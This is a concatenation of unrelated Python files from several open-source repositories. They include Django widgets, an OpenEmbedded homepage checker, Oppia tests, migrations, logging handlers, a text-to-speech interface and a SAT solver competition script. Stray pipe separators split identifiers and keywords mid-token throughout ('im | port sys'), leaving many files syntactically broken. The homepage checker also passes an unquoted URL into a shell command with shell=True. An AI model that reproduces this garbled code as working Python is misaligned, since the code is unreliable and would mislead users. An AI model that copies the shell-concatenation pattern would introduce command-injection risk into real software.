class Meta: # pylint: disable=missing-docstring
model = Reimburse
fields = [
'value',
'description',
]
| labels = {
'value': 'Valor',
'description': 'Descrição'
}
|
madisona/django-image-helper | image_helper/widgets.py | Python | bsd-3-clause | 858 | 0.002331 | from django.contrib.admin.widgets import AdminFileWidget
from django.utils.safestring import mark_safe
class AdminImagePreviewWidget(AdminFileWidget):
"""
An admin widget that shows a preview of currently selected image.
"""
def __init__(self, attrs=None, storage=None):
super(AdminImagePreviewWidget, self).__init__(attrs)
def render(self, | name, value, attrs=None, **kwargs):
content = super(AdminImagePreviewWidget, self).render(
name, value, attrs, **kwargs)
return mark_safe(content + self._get_pre | view_tag(value))
def _get_preview_tag(self, value):
if value and hasattr(value, "url"):
return '<p class="file-upload current-file-preview">Current Preview:<br />' \
'<img src="{0}" style="max-width: 300px;" /></p>'.format(value.url)
return ''
|
wwright2/dcim3-angstrom1 | sources/openembedded-core/scripts/contrib/verify-homepage.py | Python | mit | 2,175 | 0.006897 | #!/usr/bin/env python
# This script is used for verify HOMEPAGE.
# The res | ult is influenced by network environment, since the timeout of connect url is 5 seconds as default.
im | port sys
import os
import subprocess
import urllib2
def search_bitbakepath():
bitbakepath = ""
# Search path to bitbake lib dir in order to load bb modules
if os.path.exists(os.path.join(os.path.dirname(sys.argv[0]), '../../bitbake/lib/bb')):
bitbakepath = os.path.join(os.path.dirname(sys.argv[0]), '../../bitbake/lib')
bitbakepath = os.path.abspath(bitbakepath)
else:
# Look for bitbake/bin dir in PATH
for pth in os.environ['PATH'].split(':'):
if os.path.exists(os.path.join(pth, '../lib/bb')):
bitbakepath = os.path.abspath(os.path.join(pth, '../lib'))
break
if not bitbakepath:
sys.stderr.write("Unable to find bitbake by searching parent directory of this script or PATH\n")
sys.exit(1)
return bitbakepath
# For importing the following modules
sys.path.insert(0, search_bitbakepath())
import bb.tinfoil
def wgetHomepage(pn, homepage):
result = subprocess.call('wget ' + '-q -T 5 -t 1 --spider ' + homepage, shell = True)
if result:
bb.warn("Failed to verify HOMEPAGE (%s) of %s" % (homepage, pn))
return 1
else:
return 0
def verifyHomepage(bbhandler):
pkg_pn = bbhandler.cooker.recipecache.pkg_pn
pnlist = sorted(pkg_pn)
count = 0
for pn in pnlist:
fn = pkg_pn[pn].pop()
data = bb.cache.Cache.loadDataFull(fn, bbhandler.cooker.collection.get_file_appends(fn), bbhandler.config_data)
homepage = data.getVar("HOMEPAGE")
if homepage:
try:
urllib2.urlopen(homepage, timeout=5)
except Exception:
count = count + wgetHomepage(pn, homepage)
return count
if __name__=='__main__':
failcount = 0
bbhandler = bb.tinfoil.Tinfoil()
bbhandler.prepare()
print "Start to verify HOMEPAGE:"
failcount = verifyHomepage(bbhandler)
print "finish to verify HOMEPAGE."
print "Summary: %s failed" % failcount
|
Clinical3PO/Platform | dev/ML-Flex/Internals/Python/DemoArffFeatureRanker.py | Python | apache-2.0 | 2,847 | 0.004917 | # THIS SOURCE CODE IS SUPPLIED "AS IS" WITHOUT WARRANTY OF ANY KIND, AND ITS AUTHOR AND THE JOURNAL OF MACHINE LEARNING RESEARCH (JMLR) AND JMLR'S PUBLISHERS AND DISTRIBUTORS, DISCLAIM ANY AND ALL WARRANTIES, INCLUDING BUT NOT LIMITED TO ANY IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE, AND ANY WARRANTIES OR NON INFRINGEMENT. THE USER ASSUMES ALL LIABILITY AND RESPONSIBILITY FOR USE OF THIS SOURCE CODE, AND NEITHER THE AUTHOR NOR JMLR, NOR JMLR'S PUBLISHERS AND DISTRIBUTORS, WILL BE LIABLE FOR DAMAGES OF ANY KIND RESULTING FROM ITS USE. Without lim- iting the generality of the foregoing, neither the author, nor JMLR, nor JMLR's publishers and distributors, warrant that the Source Code will be error-free, will operate without interruption, or will meet the needs of the user.
#
# --------------------------------------------------------------------------
#
# Copyright 2016 Stephen Piccolo
#
# This file is part of ML-Flex.
#
# ML-Flex is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# any later version.
#
# ML-Flex is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; | without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ML-Flex. If not, see <http://www.gnu.org/licenses/>.
import os, sys, random
def parseArffAttributes(filePath):
| # Get lines in the file that have no comment character and are not empty
fileLines = [line.strip() for line in file(filePath) if not line.startswith("%") and len(line.strip()) > 0]
# Parse out only the lines that are attributes (except the class attribute)
attributeLines = [line.replace("\t", " ") for line in fileLines if line.upper().startswith("@ATTRIBUTE ") and not line.upper().startswith("@ATTRIBUTE CLASS")]
# Parse out the attribute names and return them
return [attribute.split(" ")[1] for attribute in attributeLines]
# Get the arguments that have been specified at the command line
inputFilePath = sys.argv[1]
randomSeed = int(sys.argv[2]) # This random seed demonstrates how to pass other arguments to this learner
outFilePath = sys.argv[3]
attributes = parseArffAttributes(inputFilePath)
# Set the random seed, so the random shuffling will be reproducible
random.seed(randomSeed)
# Randomly rank the attributes (this is a dumb learner for demo purposes)
random.shuffle(attributes)
# Write the attributes that have been ranked (randomly) to the output file
outFile = open(outFilePath, 'w')
for attribute in attributes:
outFile.write(attribute + "\n")
outFile.close()
|
prasanna08/oppia | core/controllers/custom_landing_pages_test.py | Python | apache-2.0 | 3,649 | 0 | # Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apac | he License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language gov | erning permissions and
# limitations under the License.
"""Tests for custom landing pages."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
from core.tests import test_utils
import feconf
class FractionLandingRedirectPageTest(test_utils.GenericTestBase):
"""Test for redirecting landing page for fractions."""
def test_old_fractions_landing_url_without_viewer_type(self):
"""Test to validate the old Fractions landing url without viewerType
redirects to the new Fractions landing url.
"""
response = self.get_html_response(
feconf.FRACTIONS_LANDING_PAGE_URL, expected_status_int=302)
self.assertEqual(
'http://localhost/math/fractions',
response.headers['location'])
def test_old_fraction_landing_url_with_viewer_type(self):
"""Test to validate the old Fractions landing url with viewerType
redirects to the new Fractions landing url.
"""
response = self.get_html_response(
'%s?viewerType=student' % feconf.FRACTIONS_LANDING_PAGE_URL,
expected_status_int=302)
self.assertEqual(
'http://localhost/math/fractions',
response.headers['location'])
class TopicLandingRedirectPageTest(test_utils.GenericTestBase):
"""Test for redirecting the old landing page URL to the new one."""
def test_old_topic_url_redirect(self):
response = self.get_html_response(
'/learn/maths/fractions', expected_status_int=302)
self.assertEqual(
'http://localhost/math/fractions', response.headers['location'])
class TopicLandingPageTest(test_utils.GenericTestBase):
"""Test for showing landing pages."""
def test_valid_subject_and_topic_loads_correctly(self):
response = self.get_html_response('/math/fractions')
response.mustcontain('<topic-landing-page></topic-landing-page>')
class StewardsLandingPageTest(test_utils.GenericTestBase):
"""Test for showing the landing page for stewards (parents, teachers,
volunteers, or NGOs).
"""
def test_nonprofits_landing_page(self):
response = self.get_html_response(
feconf.CUSTOM_NONPROFITS_LANDING_PAGE_URL)
response.mustcontain(
'<stewards-landing-page></stewards-landing-page>')
def test_parents_landing_page(self):
response = self.get_html_response(
feconf.CUSTOM_PARENTS_LANDING_PAGE_URL)
response.mustcontain(
'<stewards-landing-page></stewards-landing-page>')
def test_teachers_landing_page(self):
response = self.get_html_response(
feconf.CUSTOM_TEACHERS_LANDING_PAGE_URL)
response.mustcontain('<stewards-landing-page></stewards-landing-page>')
def test_volunteers_landing_page(self):
response = self.get_html_response(
feconf.CUSTOM_VOLUNTEERS_LANDING_PAGE_URL)
response.mustcontain('<stewards-landing-page></stewards-landing-page>')
|
cnobile2012/inventory | inventory/regions/api/urls.py | Python | mit | 1,144 | 0 | # -*- coding: utf-8 -*-
#
# inventory/regions/api/urls.py
#
"""
Reg | ion API URLs
"""
__docformat__ = "restructuredtext en"
from django.urls import re_path
| from inventory.regions.api import views
urlpatterns = [
re_path(r'countries/$', views.country_list, name='country-list'),
re_path(r'countries/(?P<pk>\d+)/$', views.country_detail,
name='country-detail'),
re_path(r'subdivisions/$', views.subdivision_list,
name='subdivision-list'),
re_path(r'subdivisions/(?P<pk>\d+)/$', views.subdivision_detail,
name='subdivision-detail'),
re_path(r'languages/$', views.language_list,
name='language-list'),
re_path(r'languages/(?P<pk>\d+)/$', views.language_detail,
name='language-detail'),
re_path(r'timezones/$', views.timezone_list,
name='timezone-list'),
re_path(r'timezones/(?P<pk>\d+)/$', views.timezone_detail,
name='timezone-detail'),
re_path(r'currencies/$', views.currency_list,
name="currency-list"),
re_path(r'currencies/(?P<pk>\d+)/$', views.currency_detail,
name="currency-detail"),
]
|
stickwithjosh/hypodrical | apps/podcast/migrations/0006_auto__del_field_podcast_clean__add_field_podcast_explicit__del_field_e.py | Python | mit | 5,558 | 0.007557 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Podcast.clean'
db.delete_column('podcast_podcast', 'clean')
# Adding field 'Podcast.explicit'
db.add_column('podcast_podcast', 'explicit',
self.gf('django.db.models.fields.CharField')(default='', max_length=1, blank=True),
keep_default=False)
# Deleting field 'Episode.clean'
db.delete_column('podcast_episode', 'clean')
# Adding field 'Episode.explicit'
db.add_column('podcast_episode', 'explicit',
self.gf('django.db.models.fields.CharField')(default='', max_length=1, blank=True),
keep_default=False)
def backwards(self, orm):
# Adding field 'Podcast.clean'
db.add_column('podcast_podcast', 'clean',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
# Deleting field 'Podcast.explicit'
db.delete_column('podcast_podcast', 'explicit')
# Adding field 'Episode.clean'
db.add_column('podcast_episode', 'clean',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
# Deleting field 'Episode.explicit'
db.delete_column('podcast_episode', 'explicit')
models = {
'podcast.category': {
'Meta': {'object_name': 'Category'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '300'})
},
'podcast.contributor': {
'Meta': {'object_name': 'Contributor'},
'bio': ('django.db.models.fields.TextField', [], {}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'home_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '300'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'blank': 'True'}),
'twitter': ('django.db.models.fields.CharField', [], {'max_length': '150'})
},
'podcast.episode': {
'Meta': {'object_name': 'Episode'},
'artwork': ('django.db.models.fields.files.ImageField', | [], {'max_length': '100', 'blank': 'True'}),
'contributors': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'episodes'", 'blank': 'True', 'to': "orm['podcast.Contributor']"}),
'episode_number': ('djang | o.db.models.fields.IntegerField', [], {'unique': 'True', 'blank': 'True'}),
'explicit': ('django.db.models.fields.CharField', [], {'max_length': '1', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'length': ('durationfield.db.models.fields.duration.DurationField', [], {'blank': 'True'}),
'mp3': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'blank': 'True'}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'blank': 'True'}),
'show_notes': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '1', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'})
},
'podcast.podcast': {
'Meta': {'object_name': 'Podcast'},
'artwork': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'author': ('django.db.models.fields.CharField', [], {'max_length': '300', 'blank': 'True'}),
'author_email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'copyright': ('django.db.models.fields.CharField', [], {'max_length': '300'}),
'explicit': ('django.db.models.fields.CharField', [], {'max_length': '1', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keywords': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '300', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'podcasts'", 'to': "orm['sites.Site']"}),
'subtitle': ('django.db.models.fields.CharField', [], {'max_length': '300', 'blank': 'True'}),
'summary': ('django.db.models.fields.TextField', [], {'blank': 'True'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['podcast'] |
Royal-Society-of-New-Zealand/NZ-ORCID-Hub | orcid_api/models/credit_name.py | Python | mit | 2,882 | 0.000694 | # coding: utf-8
"""
ORCID Member
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class CreditName(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, value=None):
"""
CreditName - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'value': 'str'
}
self.attribute_map = {
'value': 'value'
}
self._value = value
@property
def value(self):
"""
Ge | ts the value | of this CreditName.
:return: The value of this CreditName.
:rtype: str
"""
return self._value
@value.setter
def value(self, value):
"""
Sets the value of this CreditName.
:param value: The value of this CreditName.
:type: str
"""
self._value = value
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, CreditName):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
vegitron/permissions_logging | permissions_logging/__init__.py | Python | apache-2.0 | 3,690 | 0.000271 | """
A collection of log handlers that allow file permissions to be specified.
"""
import logging
import logging.handlers as handlers
import os
import datetime
class FileHandler(logging.FileHandler):
"""
A subclass of logging.FileHandler that accepts a permissions argument.
The file used for logging will have the value of the permissions keyword
value, e.g. for unix: permissions=0o664
"""
def __init__(self, filename, permissions=0o644, **kwargs):
self.permissions = permissions
logging.FileHandler.__init__(self, filename)
def _open(self):
stream = logging.FileHandler._open(self)
try:
os.chmod(self.baseFilename, self.permissions)
except OSError as ex:
# If we don't have access to change the permissions, we need to
# rely on the initial file creator having done the chmod
pass
return stream
class DateNameFileHandler(FileHandler):
"""
A subclass that allows for filenames w/ a dateformat.
Will close and reopen filehandles as needed. |
For example, you could configure a handler to to have this filename:
/tmp/logs/my_app-%Y-%M-%d.log
"""
def __init__(self, *args, **kwargs):
self._originalBaseFilename = None
FileHandler.__init__(self, *args, **kwargs)
| def emit(self, *args, **kwargs):
"""
If we our open file's name no longer matches the current moment's
version of the filename, close it. emit in FileHandler will open
a new handle as needed.
"""
if self.baseFilename != self._get_current_filename():
self.close()
FileHandler.emit(self, *args, **kwargs)
def _open(self, *args, **kwargs):
"""
Saves the original base filename, then overrides it with a date
formatted filename. Uses strftime arguments.
"""
if not self._originalBaseFilename:
self._originalBaseFilename = self.baseFilename
self.baseFilename = self._get_current_filename()
return FileHandler._open(self, *args, **kwargs)
def _get_current_filename(self):
return datetime.datetime.now().strftime(self._originalBaseFilename)
class TimedRotatingFileHandler(FileHandler, handlers.TimedRotatingFileHandler):
"""
A subclass of logging.handlers.TimedRotatingFileHandler that accepts
a permissions argument.
The file used for logging will have the value of the permissions keyword
value, e.g. for unix: permissions=0o664
"""
def __init__(self, filename, permissions=0o644, **kwargs):
self.permissions = permissions
handlers.TimedRotatingFileHandler.__init__(self, filename, **kwargs)
class WatchedFileHandler(FileHandler, handlers.WatchedFileHandler):
"""
A subclass of logging.handlers.WatchedFileHandler that accepts
a permissions argument.
The file used for logging will have the value of the permissions keyword
value, e.g. for unix: permissions=0o664
"""
def __init__(self, filename, permissions=0o644, **kwargs):
self.permissions = permissions
handlers.WatchedFileHandler.__init__(self, filename, **kwargs)
class RotatingFileHandler(FileHandler, handlers.RotatingFileHandler):
"""
A subclass of logging.handlers.RotatingFileHandler that accepts
a permissions argument.
The file used for logging will have the value of the permissions keyword
value, e.g. for unix: permissions=0o664
"""
def __init__(self, filename, permissions=0o644, **kwargs):
self.permissions = permissions
handlers.RotatingFileHandler.__init__(self, filename, **kwargs)
|
linuxdeepin/deepin-translator | src/tts_interface.py | Python | gpl-3.0 | 4,811 | 0.008938 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2011 ~ 2013 Deepin, Inc.
# 2011 ~ 2013 Wang Yong
#
# Author: Wang Yong <lazycat.manatee@gmail.com>
# Maintainer: Wang Yong <lazycat.manatee@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from PyQt5.QtCore import pyqtSlot, QObject
import imp
from tts_plugin import TtsPlugin
from config import setting_config
from deepin_utils.net import is_network_connected
tts_plugin = TtsPlugin()
voice_simple = imp.load_source("voice_simple", tts_plugin.get_plugin_file(setting_config.get_translate_config("word_voice_engine")))
voice_long = imp.load_source("voice_long", tts_plugin.get_plugin_file(setting_config.get_translate_config("words_voice_engine")))
word_voice_model = tts_plugin.get_voice_model(setting_config.get_translate_config("src_lang"))
words_voice_model = tts_plugin.get_voice_model(setting_config.get_translate_config("src_lang"))
def get_voice_modules():
if not is_network_connected() or setting_config.get_trayicon_config("local_translate"):
voice_engines = tts_plugin.get_voice_engines(setting_config.get_translate_config("sr | c_lang"), False)
voice_engine_names = map(lambda (name, display_name): name, voice_engines)
if len(voice_engine_names) > 0:
local_simple = imp.load_source("local_simple", tts_plugin.get_plugin_file(voice_engine_names[0]))
return [local_simple]
else:
return []
else:
return [voice_simple, voice_long]
def get_voice(text, voice):
if not is_network_connected() or setting_conf | ig.get_trayicon_config("local_translate"):
voice_engines = tts_plugin.get_voice_engines(setting_config.get_translate_config("src_lang"), False)
voice_engine_names = map(lambda (name, display_name): name, voice_engines)
if len(voice_engine_names) > 0:
local_simple = imp.load_source("local_simple", tts_plugin.get_plugin_file(voice_engine_names[0]))
return local_simple.get_voice(text)
else:
return []
else:
return voice.get_voice(text)
def get_voice_simple(text):
global voice_simple
return get_voice(text, voice_simple)
def get_voice_long(text):
global voice_long
return get_voice(text, voice_long)
def get_phonetic_symbol(text):
# Return nothing if text is not ONE word.
if len(text.split(" ")) <= 0:
return ""
if not is_network_connected() or setting_config.get_trayicon_config("local_translate"):
# Not found local phonetic yet.
return ""
else:
global voice_simple
return voice_simple.get_phonetic_symbol(text)
class TtsInterface(QObject):
def __init__(self):
QObject.__init__(self)
@pyqtSlot()
def update_word_voice_module(self):
global voice_simple
voice_simple = imp.load_source("voice_simple", tts_plugin.get_plugin_file(setting_config.get_translate_config("word_voice_engine")))
@pyqtSlot()
def update_words_voice_module(self):
global voice_long
voice_long = imp.load_source("voice_long", tts_plugin.get_plugin_file(setting_config.get_translate_config("words_voice_engine")))
@pyqtSlot()
def update_voice_with_src_lang(self):
voice_engines = tts_plugin.get_voice_engines(setting_config.get_translate_config("src_lang"))
voice_engine_names = map(lambda (name, display_name): name, voice_engines)
word_voice_model.setAll(voice_engines)
words_voice_model.setAll(voice_engines)
current_word_voice_engine = setting_config.get_translate_config("word_voice_engine")
current_words_voice_engine = setting_config.get_translate_config("words_voice_engine")
if current_word_voice_engine not in voice_engine_names:
setting_config.update_translate_config("word_voice_engine", voice_engine_names[0])
self.update_word_voice_module()
if current_words_voice_engine not in voice_engine_names:
setting_config.update_translate_config("words_voice_engine", voice_engine_names[0])
self.update_words_voice_module()
tts_interface = TtsInterface()
|
AdrienVR/NaoSimulator | TPINFO/Partie3/exercice1.py | Python | lgpl-3.0 | 659 | 0.045524 | #Initialisation
from time import sleep
from NaoCommunication import *
nao=NaoControle(Nao())
# 1 - Decrire le resultat de ce | morceau de code
# ...
for a in range(16):
if a%2==0:
nao.reglerCouleur(a,a*15,50,50)
else :
nao.reglerCouleur(a,255,0,0)
sleep(0.1)
for a in range(15,-1,-1):
nao.eteindreLed(a)
sleep(0.1)
# 2 - Decrire le resultat de ce deuxieme morceau de code
# ...
for a in range(15,-1,-1):
nao.allumerLed(a)
| sleep(0.1)
for a in range(0,16,1):
nao.eteindreLed(a)
sleep(0.1)
# 3 - A partir des exemples precedents, ecrire un code qui
# allume alternativement les deux leds 1 seconde chacune
# pendant 10 secondes.
|
TimSchmittmann/HamiltonSAT | competition.py | Python | mit | 10,521 | 0.044578 | import sys
import subprocess
import string
import random
import glob;
import os;
import shutil;
from subprocess import *
import resource
import signal
#
# set the default timeout to some value
#
DEFAULT_TIMEOUT = 10
DEFAULT_MEMORYLIMIT = 1024*1024*1024*2
#
# Set maximum CPU time to the global timeout
#
GLOBALTIMEOUT = DEFAULT_TIMEOUT
GLOBALMEMORYLIMIT = DEFAULT_MEMORYLIMIT
def setlimits():
#print "Setting resource limit in child (pid %d)" % os.getpid()
resource.setrlimit(resource.RLIMIT_CPU, (GLOBALTIMEOUT, GLOBALTIMEOUT+1))
resource.setrlimit(resource.RLIMIT_AS, (GLOBALMEMORYLIMIT, GLOBALMEMORYLIMIT+1))
os.setpgrp()
#
# Check whether a string is a number
#
def is_number(s):
try:
int(s)
return True
except ValueError:
return False
#
# Run the competition with the solvers and files specified in the list
#
def main( solversName, filesName, unsatInstancesList ):
# print PID
pid = os.getpgid(0)
competitionDir = os.getcwd()
print "process id: " + str(pid)
# read the two files
solversFile = open(solversName, 'r')
filesFile = open(filesName, 'r')
unsatFile = open( unsatInstancesList, 'r' )
solverData = solversFile.readlines()
fileData = filesFile.readlines()
unsatFilesList = unsatFile.readlines() # nothing more to do, each line contains exactly one file
solversFile.close()
filesFile.close()
unsatFile.close()
# split file data into filename and timeout
files = list()
timeouts = list()
print "checking files ..."
for line in fileData:
blankPos = line.find(" ")
fileName = line[0 : blankPos ]
if 0 == os.path.exists(fileName) :
print "file " + fileName + " does not exist or cannot be accessed, drop it"
continue
timeoutString = line [blankPos + 1:]
timeout = DEFAULT_TIMEOUT
if( is_number(timeoutString) ):
timeout = int( timeoutString )
files.append(fileName)
timeouts.append(timeout)
# print "found file " + fileName + " with timeout " + str(timeout)
# split solver data into solvername and solver call
solverNames = list() # name of the solver
solverCalls = list() # string to call the solver
solverTime = list() # time that has been used for solved instances
solverSolved = list() # number of correctly solved instances
solverFailed = list() # number of incorrect solutions
print "parsing solvers ..."
for line in solverData:
blankPos = line.find(" ")
solverName = line[0 : blankPos ]
solverCall = line [blankPos + 1:-1]
solverNames.append(solverName)
solverCalls.append(solverCall)
solverTime.append(0)
solverSolved.append(0)
solverFailed.append(0)
# print "found file " + fileName + " with timeout " + str(timeout)
print "default timeout: " +str(DEFAULT_TIMEOUT)
print "default memory limit: " +str(GLOBALMEMORYLIMIT)
print "run competition for " + str(len(solverNames)) + " solvers and " + str(len(files)) + " files\n\n"
evaFile = open ("evaluation.dat","w")
evaFile.write("instance ");
sys.stdout.write("instance ");
# delete old files!
for solver in solverNames:
evaFile.write(solver + " ");
sys.stdout.write(solver + " ")
evaFile.write("\n");
sys.stdout.write("\n")
# iterate over files
for j in range(0, len(files) ):
filename = files[j]
basename = os.path.basename(filename)
timeout = timeouts[j]
evaFile.write(filename + " ")
sys.stdout.write(filename + "-(" + str(timeout) + "s)"+ " ");
# store different found states for the current graph and all solvers
states=list()
foundSAT = False
foundUNSAT = False
# iterate over solvers
for i in range(0, len(solverNames) ):
solver = solverNames[i]
call = solverCalls[i]
# run the solver
errFile = open("tmp/"+solver+"-"+basename+".err", "w");
outFile = open("/tmp/"+solver+"-"+basename+"-"+str(pid), "w");
os.chdir("solvers/" + solver)
childTimer = os.times()[2]
# print call
#solvingProcess = subprocess.Popen( str(call + " " + filename).split(), shell=True, stderr=PIPE, stdout=PIPE, preexec_fn=signal.pause) # setlimits(timeout) ) #.communicate()[0]
GLOBALTIMEOUT = timeout
"""
print "Errfile: "+str(errFile);
print "outFile: "+str(outFile);
print "call: "+str(call + " " + filename);
"""
exitCode = subprocess.call(str(call + " " + filename).split(), stdout=outFile, stderr=errFile, preexec_fn=setlimits )
errFile.close()
outFile.close()
# wait for th | e solver to terminate
childTimer = os.times()[2] - childTimer
# print call + " " + filename + " with exitCode " + str(exitCode) + " and runtime " + str( childTimer ) + " vs " + str(timeout)
os.chdir(competitionDir)
# if exit code is negative, the process has been terminated by a signal (including timeout)
# if no valid exit code is found, the in | stance is considered as unsolved as well
if childTimer >= timeout or (exitCode != 10 and exitCode != 20):
evaFile.write("T ");
sys.stdout.write("T ");
states.append(0)
else:
# otherwise, check the returned solution
# subprocess.call(["cat","/tmp/"+solver+"-"+basename+"-"+str(pid)])
checkCode = subprocess.call(["./hc-verifier","-w","-v","-v", filename], stdin=open( "/tmp/"+solver+"-"+basename+"-"+str(pid) ) , stdout=open('/dev/null', 'w'), stderr=open('/dev/null', 'w') )
# inject faulty system
#if i == 0:
# checkCode = 20
# exitCode = 20
#print "checkcode: " + str(checkCode)
# evaluate the run
if checkCode == 10: # verified satisfiable hamiltonian cycle
solverTime[i] = solverTime[i] + childTimer
solverSolved[i] = solverSolved[i] + 1
evaFile.write(str(childTimer) + " ")
sys.stdout.write(str(childTimer) + " ");
states.append(10)
foundSAT = True
elif checkCode == 15: # false answer
solverFailed[i] = solverFailed[i] + 1
# copy faulty file!
outFile = open("/tmp/"+solver+"-"+basename+"-"+str(pid), "r");
errFile = open("tmp/"+solver+"-"+basename+".fail", "w+");
for line in outFile.readlines():
errFile.write( line )
errFile.close()
outFile.close()
evaFile.write("F"+str(exitCode)+" ")
sys.stdout.write("F"+str(exitCode)+"-" + str(childTimer) + "-" + str(checkCode) + " ");
states.append(15)
elif checkCode == 20: # unsat answer
solverTime[i] = solverTime[i] + childTimer
solverSolved[i] = solverSolved[i] + 1
evaFile.write(str(childTimer) + " ")
sys.stdout.write(str(childTimer) + " ");
states.append(20)
foundUNSAT = True
else:
evaFile.write("E-" + str(exitCode) + "-" + str(checkCode) + " ")
sys.stdout.write("E-"+ str(exitCode) + "-"+ str(checkCode) + " ");
states.append(127)
os.remove( "/tmp/"+solver+"-"+basename+"-"+str(pid) )
# checked all solvers, print next line
evaFile.write("\n")
sys.stdout.write("\n");
#TODO check unsat for all systems
if foundSAT and foundUNSAT :
print "found discrepancy for SAT and UNSAT ..."
print "states: : " + str( len(states) )
# solverFailed
for i in range(0, len(solverNames) ):
solver = solverNames[i]
print solver + " : " + str( states[i] )
if states[i] == 20: #incorrect value, as we have a verified sat value
if solverFailed[i] == 0:
print "disqualify solver " + solver + " for wrong answer on " + filename
solverFailed[i] = solverFailed[i] + 1
# print "CPU limit of parent (pid %d) after startup of child" % os.getpid(), resource.getrlimit(resource.RLIMIT_CPU)
# print "delete /tmp/*.txt*"
filelist = glob.glob("/tmp/*.txt*")
# print str(filelist)
for f in filelist:
os.remove(f)
# subprocess.call(["rm", "-f", "/tmp/*.txt*"], stdout=open('/dev/null', 'w'), stderr=open('/dev/null', 'w') )
# if j % 5 == 0:
# evaFile.close()
# subprocess.call(["./plotCactus.sh", "evaluation.dat", str( len(solverNames) ), "visualization"], stdout=open('/dev/null', 'w'), stderr=open('/dev/null', 'w') )
# evaFile = open ("evaluation.dat", "a" )
# do the final plot after all solvers have been executed
evaFile.close()
subprocess.call(["./plotCactus.sh", "evaluation.dat", s |
jashwanth9/Expert-recommendation-system | code/labels_range.py | Python | apache-2.0 | 806 | 0.008685 | import json
import numpy as np
import cPickle as pickle |
with open('../validation/v_xgboost_word_tfidf.csv') as train_file:
content = train_file.readlines()
testData = []
scores = []
element = content[1].strip("\r\n").split(",")
for i in range(1, len(content)):
element = content[i].strip("\r\n").split(",")
testData.append([element[0],element[1]])
scores.append(float(element[2]))
predictions = []
maxscore = max(scores)
minscore = min(scores)
for score in scores:
pre | dictions.append((score-minscore)/float(maxscore-minscore))
